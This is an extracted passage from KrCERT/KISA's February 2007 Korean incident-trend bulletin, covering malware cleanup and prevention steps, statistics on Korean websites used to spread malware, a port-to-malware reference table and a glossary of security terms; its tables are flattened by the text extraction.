Part 1 Part 2 Part 3 월간특집 Step 3. 시작 설정 제어판 네트워크 및 전화접속 로컬영역 연결(마우스 오른쪽 버튼 클릭하여 등록정보 선택) 설치 클릭 프로토콜 선택 후 추가 인터넷 프로토콜(TCP/IP) 선택 후 확인 4 악성코드 okviewer4.dll 삭제 윈도우 시스템 폴더에 생성된 okviewer4.dll를 삭제 윈도우 시스템 폴더 WinNT,2000 c:\winnt\system32 WnXP c:\windows\system32 6. 사전 예방 방법 사용자는 감염을 예방하기 위하여 인터넷 사용 전에 반드시 최신 패치를 적용하도록 한다. 웹 관리자는 관리 웹페이지 내에 관리자가 알지 못하는 확인되지 않은 코드가 존재하는지 수시로 점검한다. 또한, 웹 서버에 취약점이 없도록 최신 패치를 적용하고 암호설정, 접근제어 등을 강화 하도록 한다. Arp Spoofing 공격을 방지하기 위해서는 동일 세그먼트 내에 있는 서버들에 대한 보안관리가 필 요하다. 42 2007년 2월호

www.krcert.or.kr 별첨 악성코드 유포지/경유지 조기 탐지 및 차단 조치 1. 개요 KISA 인터넷침해사고대응지원센터에서는 국내 웹사이트에 악성코드가 삽입되어 웹사이트 방문자에게 게임 ID/비밀번호를 유출하는 트로이잔을 감염시키는 사례가 발생하여 05년 6월부터 지속 대응하여 왔으며, 05. 12월부터는 악성코드 은닉사이트 탐지 프로그램을 자체 개발 적용하여 약 77,000개의 국내 웹 사이 트를 대상으로 악성코드 은닉 여부를 탐지 및 차단 조치하고 있다. 2. 전체 추이 07년 2월 KISA에서 탐지하여 대응한 악성코드 유포지 및 경유지 사이트는 396건으로 전월 대비 17.3%(480 397건) 감소하였다. 악성코드 경유지사이트 수는 전월대비 17.5%(372 307건) 감소하였고, 유포사이트 수는 전월에 비하여 16.7%(108 90건) 감소한 것으로 나타났다. 각 기관(기업)의 웹 서버 관리자는 웹페이지가 악성코드 유포 및 경유지로 악용되는 피해예방을 위 해 웹서버 해킹에 주로 사용되는 SQL Injection 등의 취약점에 대한 보안대책을 마련하는 것이 중 요하다. 참고 사이트 ModSecurity를 이용한 아파치 웹서버 보안 : http://www.krcert.or.kr 초기화면 왼쪽 공개 웹 방화벽을 이용한 홈페이지 보안 WebKnight를 이용한 SQL Injection 공격 차단 : http://www.krcert.or.kr 초기화면 왼쪽 공개 웹 방화벽을 이용한 홈페이지 보안 홈페이지 개발 보안가이드 : http://www.krcert.or.kr 초기화면 왼쪽 홈페이지 개발 보안가이드 웹 어플리케이션 보안 템플릿 : http://www.krcert.or.kr 초기화면 왼쪽 웹 어플리케이션 보안 템플릿 [표] 악성코드 유포지/경유지 사고 처리건수 기관 2006 2007 2007 총계 1 2 3 4 5 6 7 8 9 10 11 12 총계 유포지 993 108 90 198 경유지 5,624 372 307 679 합계 6,617 480 397 877 3. 기관별 분류 악성코드 유포지 및 경유지로 악용된 사이트를 기관별로 분류하면 기업, 기타(개인), 비영리 홈페이지 순이 었으며, 특히 기업으로 분류된 co.kr, com 도메인이 악성코드 유포지/경유지 사이트로 많이 악용되는 것 으로 나타났다. 이는 해커가 일반 이용자의 접속이 많은 기업 사이트를 주로 악성코드 유포지/경유지 사이트로 악 용하고 있는 것으로 판단된다. 인터넷 침해사고 동향 및 분석 월보 43

Part 1 Part 2 Part 3 월간특집 [표] 악성코드 유포지/경유지 사이트 피해기관(도메인)별 분류 기관 2006 2007 2007 총계 1 2 3 4 5 6 7 8 9 10 11 12 총계 기업 4,274 296 232 528 대학 154 10 5 15 비영리 649 33 27 60 연구소 24 0 0 0 네트워크 215 15 13 28 기타(개인) 1,301 126 120 246 총계 6,617 480 397 877 기관 분류기준 : 기업(co, com), 대학(ac), 비영리(or, org), 연구소(re), 네트워크(ne, net), 기타(pe 등) 네트워크 3% 비영리 7% 기타(개인) 30% 대학 1% 기업 59% (그림) 악성코드 유포지/경유지 사이트 피해기관(도메인)별 분류 4. 웹서버별 분류 악성코드 유포지 및 경유지로 악용된 사이트를 웹서버 별로 분류한 결과 IIS 웹서버가 58.9%, Apache 웹 서버가 2.9%, 기타 38.2%로 분류되었다. [표] 악성코드 유포지/경유지 사이트 웹서버 별 분류 웹서버 2006 2007 2007 총계 1 2 3 4 5 6 7 8 9 10 11 12 총계 MS IIS Apache 기타 합계 5,039 151 1,427 6,617 334 4 142 480 244 12 141 397 웹서버별 구분 자료는 각 운영체제/웹서버의 안전성과는 상관관계가 없으며, 단지 탐지에 따른 분석 자료임 악성코드 유포지/경유지 사이트가 이미 폐쇄되어 웹서버를 파악하기 어려운 경우도 기타에 포함시켰음 578 16 283 877 44 2007년 2월호

www.krcert.or.kr 부록 주요포트별 서비스 및 관련 악성코드 포트번호 프로토콜 서비스 관련 악성코드 22 TCP SSH Remote Login Protocol [trojan] Adore sshd, [trojan] Shaft Mydoom, Welchia, Doomjuice, Agobot, Polybot, Bagle, 80 TCP World Wide Web, HTTP Yaha,Spybot, Back Orifice 2k Plug-Ins, CGI Backdoor, Executor, Hooker, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader, Zombam 135 TCP/UDP DCE endpoint resolution, MS-RPC Blaster, Agobot, Yaha, Welchia, Polybot, Kibuv, Lovgate, Spybot 139 TCP Netbios-ssn God Message worm, Netlog, Qaz, Deborms, Moega, Yaha Agobot, Deloder, Yaha, Randex, Welchia, Polybot, 445 TCP netbios-ds Sasser, Bobax, Kibuv, Korgo, Spybot, Janx, Netdepix, Zotob, IRCBot, SDBot 1025 TCP/UDP network blackjack Dasher, Remote Storm, ABCHlp, Lala, Keco 1080 TCP/UDP SOCKS Protocol MyDoom, Proxmeg, Bugbear, Hagbard, Daemoni, Lixy 1433 TCP/UDP Microsoft-SQL-Server Spida, SQL Snake 1434 TCP Microsoft-SQL-Server SQL Slammer 2745 TCP urbisnet Bagle 3410 TCP/UDP NetworkLens SSL Event OptixPro, Mockbot 4899 TCP radmin-port RAdmin Port 5000 TCP/UDP commplex-main Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Bobax, Trojan.Webus 6129 TCP/UDP DameWare Mockbot. 인터넷 침해사고 동향 및 분석 월보 45

용어정리 Part 1 Part 2 Part 3 월간특집 구분 구성설정오류 공격 바이러스(Virus) 바이러스 월(Virus Wall) 버퍼오버플로우 (Buffer Overflow) 봇(Bot) 분산서비스거부공격 (DDoS : Distributed DoS) 불법자원사용 불법침입 서비스거부공격 (DoS : Denial of Service) 스파이웨어(Spyware) 스팸릴레이(Spam Relay) 허니넷 악성프로그램 악성프로그램 공격 애드웨어(Adware) 웜(Worm) 내용 운영체제 및 응용프로그램의 설정 오류(위험성이 있는 기본설정의 사용, 사용자 편의를 위한 설정 조정 등)를 이용하는 해킹기법으로 홈페이지 위 변조, 불법침입 등에 주로 이용됨 컴퓨터 프로그램이나 메모리에 자신 또는 자신의 변형을 복사해 넣는 악의적인 명령어들로 조합하여 불특정 다수에게 피해를 주기 위한 목적으로 제작된 모든 컴퓨터 프로그램 또는 실행 가능한 코드 네트워크 환경 내부에 인-라인(In-line) 상태에서 LAN 세그먼트의 트래픽을 관리하여 트래픽 상의 네트워크 바이러스를 예방 및 차단하는 시스템 메모리에 할당된 버퍼의 크기보다 더 큰 데이터를 덮어씀으로써 호출 프로그램으로의 복귀오류 등 을 일으켜 정상적인 프로그램의 실행을 방해하는 대표적인 공격기법 운영체제 취약점, 비밀번호의 취약성, 웜 바이러스의 백도어 등을 이용하여 전파되며, 해킹명령 전 달 사이트와의 백도어 연결 등을 통하여 스팸메일 전송이나 DDoS 공격에 악용이 가능한 프로그램 또는 실행 가능한 코드 DoS용 에이전트를 여러 개의 시스템에 설치하고, 이 에이전트를 제어하여 DoS 공격을 함으로써 보 다 강력한 공격을 시도할 수 있으며, 공격자에 대한 추적 및 공격트래픽의 차단을 어렵게 만드는 공 격형태 정당한 권한 없이 특정 시스템을 스팸릴레이, 피싱사이트 개설 등에 이용하는 행위 주요 정보 자료를 수집 또는 유출하기 위하여 정당한 권한 없이 시스템에 침입하는 행위 특정 네트워크에서 허용하는 대역폭을 모두 소모시키거나, 공격대상(victim) 시스템의 자원(CPU, 메 모리 등)을 고갈시키거나, 시스템 상에서 동작하는 응용프로그램의 오류에 대한 공격으로 서비스를 못하도록 만드는 공격 이용자의 동의 없이 정보통신기기에 설치되어 정보통신시스템, 데이터 또는 프로그램 등을 훼손 멸 실 변경 위조하거나 정상 프로그램 운용을 방해하는 기능을 수행하는 악성 프로그램. 즉, 이용자 의 동의 없이, 웹브라우저의 홈페이지 설정이나 검색 설정을 변경, 정상 프로그램의 운영을 방해 중지 또는 삭제, 컴퓨터 키보드 입력 내용이나 화면 표시 내용을 수집 전송하는 등의 행위를 하는 프로그램 스팸 메일 발신자 추적을 어렵게 하기 위하여 타 시스템을 스팸 메일발송에 악용 KISA 인터넷침해사고대응지원센터 내에 설치된 시험 네트워크로 스캔정보를 비롯한 공격행위, 웜 바이러스 등을 수집 사용자의 시스템에 설치되어 백도어를 오픈하여 정보를 유출하거나, 시스템의 정상적인 동작을 방해 하는 프로그램 컴퓨터 시스템에 악성프로그램을 설치하게 유도하거나 고의로 감염시키는 해킹기법으로 주로 백 도어 등을 이용하여 상대방의 주요 정보를 빼내기 위한 목적으로 이용함 사용자의 컴퓨터에 광고성 팝업 창을 띄우거나, 초기화면을 특정사이트로 고정시키는 등의 사용자가 의도하지 않는 행위를 수행하게 하는 프로그램 또는 실행 가능한 코드 독립적으로 자기복제를 실행하여 번식하는 빠른 전파력을 가진 컴퓨터 프로그램 또는 실행 가능한 코드 46 2007년 2월호

www.krcert.or.kr 구분 지역센서 취약점정보수집 공격 침입시도 트로이잔(Trojan) 피싱(Phishing) 해킹(Hacking) ASP.NET Botnet DHTML Editing Component ActiveX E-mail 관련 공격 Hyperlink 개체 라이브러리 KrCERT/CC LLS NetBIOS OLE/COM PNG SMB TCP Syn Flooding Windows SharePoint Services Windows Shell 내용 공격징후 탐지를 위하여 KISA에서 전국 45개 주요도시에 설치한 센서 대상시스템의 운영체제, 설정 등을 알아보기 위하여 스캔하는 등의 행위로 주로 해킹의 사전단계로 이용됨 시스템에 침입하려고 시도하거나, 취약점 정보의 수집을 위해 스캔하는 등의 행위 자기복제 능력은 없으나 정상기능의 프로그램으로 가장하여 프로그램내에 숨어있는 코드조각으로 의도 하지 않은 기능을 수행하는 컴퓨터 프로그램 또는 실행 가능한 코드 정상적인 웹서버를 해킹하여 위장사이트를 개설한 후, 인터넷 이용자들의 금융정보 등을 빼내는 신종사기 수법으로 Bank Fraud, Scam이라고도 함 다른 사람의 컴퓨터나 정보시스템에 불법 침입하거나, 정보시스템의 정상적인 기능이나 데이터에 임의적 으로 간섭하는 행위 개발자가 웹 응용프로그램 및 XML 웹 서비스를 구축할 수 있도록 돕는 기술로, 정적 HTML과 스크립팅 을 사용하는 일반 웹 페이지와는 달리, 이벤트에 기반한 동적인 HTML 웹페이지를 제공함 많은 Bot 감염시스템들이 명령을 수신할 목적으로 IRC에 연결되어 있는 네트워크 인터넷 익스플로러가 웹메일처럼 HTML문서를 제작할 수 있도록 해주는 ActiveX 컨트롤 상대방의 시스템에 메일서버를 설치하여 스팸릴레이에 악용하거나, 관심을 끄는 E-mail을 보냄으로써 상 대방이 악성프로그램을 설치하도록 하는 해킹기법으로 주로 스팸릴레이나 악성프로그램의 설치에 이용됨 응용프로그램들이 HTML 문서에서 사용되는 Hyperlink 처리를 위한 기능을 제공 KISA내 침해사고대응팀(CERT)으로서, 국내에서 운영되고 있는 인터넷 망의 침해사고 대응 활동을 지원 하고, 전산망 운용기관 등에 대해 통일된 협조 체제를 구축하여, 국제적 침해사고 대응을 위한 단일창구를 제공하기 위하여 설립됨 License Logging Service의 약자로 MS서버제품에 대한 라이센스를 고객이 관리할 수 있도록 해주는 도구 네트워크의 기본적인 입출력을 정의한 규약 Object Linking And Embedding, Component Object Model의 약자로 MS의 객체기반 기술의 일종 으로서 서로 다른 응용프로그램이나 플랫폼이 데이터를 공유하는데 사용 Portable Network Graphics의 약자로 GIF나 JPEG처럼 그림파일 포맷의 일종으로, 주로 UNIX/LINUX 환경에서 아이콘 등에 많이 사용 Server Message Block의 약자로 파일이나 네트워크 폴더 및 프린터 공유 등에 사용되는 프로토콜 TCP 연결특성을 이용한 DoS 공격의 일종으로 Unreachable한 주소로 IP를 위조하여 Syn을 보내서 대 상시스템이 더 이상의 연결요청을 받아들일 수 없도록 만드는 공격 많은 인원이 동시에 다양한 정보공유와 공동 문서제작을 위한 웹사이트를 제작하는데 필요한 서비스 윈도우 시스템의 제반실행환경을 제공해 주는 것으로 explorer.exe가 책임을 맡고 있다. 인터넷 침해사고 동향 및 분석 월보 47